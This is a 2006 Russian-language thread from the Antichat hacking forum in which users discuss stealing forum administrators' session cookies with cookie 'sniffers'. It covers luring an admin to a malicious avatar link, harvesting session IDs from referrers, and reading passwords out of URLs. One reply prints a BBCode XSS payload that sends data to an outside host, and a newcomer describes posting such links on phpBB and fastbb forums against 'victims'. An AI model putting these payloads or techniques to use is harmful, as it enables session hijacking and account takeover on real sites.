Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Простой вопрос про сниффер |
28.01.2006, 01:39
|
|
Новичок
Регистрация: 27.01.2006
Сообщений: 8
Провел на форуме:
11116
Репутация:
0
|
|
Простой вопрос про сниффер
Народ, такой вопрос:
Сниффером мы можем получать куки. Но только куки того процесса, где был выполнен Джаваскрипт. Следовательно, для использования сниффера, в любом случае требуется искать уязвимость, пропускающую Джаваскрипт?
Тогда не очень ясен один вопрос - в статье про снифферы на Античате, неточно помню, был описан такой прием получения админских куков на форуме, как просьба посмотреть неоткрывающийся аватар (в котором сидит Js). Админу дается ссылка, и просится на нее зайти.
Но вель тогда сниффер получит куки, которые относятся к новому открытому документу - странице с картинкой, и толку от этого никакого.
То есть, главный вопрос:
Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?
|
|
|
28.01.2006, 02:16
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524
Репутация:
9
|
|
Сообщение от errou
Народ, такой вопрос:
Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?
Можно, его использовать для получения реффера (тоесть адреса, с которого зашел чел на сниффер). Так можно воровать сессии. А бывают и такие чаты, или еще ченить, где в дресе пишется
http://site/chat/?userId=1234&room=3&pwd=qwerty
Из этой строки можно узнать пароль ))))))))))))))))))))))
|
|
|
|
28.01.2006, 22:15
|
|
Новичок
Регистрация: 27.01.2006
Сообщений: 8
Провел на форуме:
11116
Репутация:
0
|
|
Спасибо.
|
|
|
|
29.01.2006, 17:27
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032
Репутация:
1
|
|
чтобы не создавать тему спрашиваю здесь....
когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
сасое большое, что я получаю, это ip адрес...
|
|
|
|
29.01.2006, 19:30
|
|
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706
Репутация:
1419
|
|
чтобы не создавать тему спрашиваю здесь....
когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
сасое большое, что я получаю, это ip адрес..
Ха-ха-ха-ха.... Я ща умру от смеха))))
Где ты в JS видел такое??? Например:
Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL][/color]` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/nofear/pic.gif?;"+админ@yandex.ru.txt)`
Если это щас увидят знающие люди, они сдохнут со смеха )))
Последний раз редактировалось •••™NO FEAR™•••; 29.01.2006 в 19:34..
|
|
|
|
29.01.2006, 19:30
|
|
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718
Репутация:
268
|
|
Мдаааааааааа!!!
Сообщение от ZetRoX
когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
Ты вообще сам понял, что спросил! И че ты надеялся получить если бы ты написал вместо document.cookie -
админ@yandex.ru.txt. Немного подумав я сделал вывод что ты видимо хотел получить некий файл админ@yandex.ru.txt или файл админа с yandex.ru под названием yandex.ru.txt, ХА ХА ХА!!! ОБЛОМИСЬ ИМХО!!! =)
Сообщение от ZetRoX
очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
Ну и не получиться!
Сообщение от ZetRoX
сасое большое, что я получаю, это ip адрес...
Честно говоря с первого раза я не понял этого предложения =).
Поверь мне ты получишь не только ip адресс, хотя..... наверное ТЫ ничего не получишь.....
УЧИ МАТ ЧАСТЬ, ИМХО!!!!!!!!
|
|
|
|
29.01.2006, 20:16
|
|
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453
Репутация:
113
|
|
СДОХНУТЬ МОЖНО!!!!!!!!!!)))))))))))))))))))))))))))))) )))))))))))))))))))))))))) ну и ЛОЛЛЛЛЛЛЛЛЛ
когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
 |
|
|
|
29.01.2006, 22:16
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032
Репутация:
1
|
|
ну хорошо, лоханулся....
а в чем тогда проблема??? я даже на себе проверял.....пишу я нужный код, с помощью кодера (ну, ссылки на них где-то давали).....в сообщении оставляю ссылку, сам кликаю и на снифак приходит только Ip адрес жертвы....
что делать....ну помогите начинающему...все же когда-то были такими....
|
|
|
|
29.01.2006, 22:56
|
|
Участник форума
Регистрация: 13.11.2005
Сообщений: 199
Провел на форуме:
824195
Репутация:
75
|
|
НА чем ты тестишь? НА форуме? Движок и версия какая?
|
|
|
|
30.01.2006, 00:04
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032
Репутация:
1
|
|
да на форумах.....phpbb 2.0.18 или fastbb (версию не помню, но не самаЯ последняя, где-то предпоследняя...)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
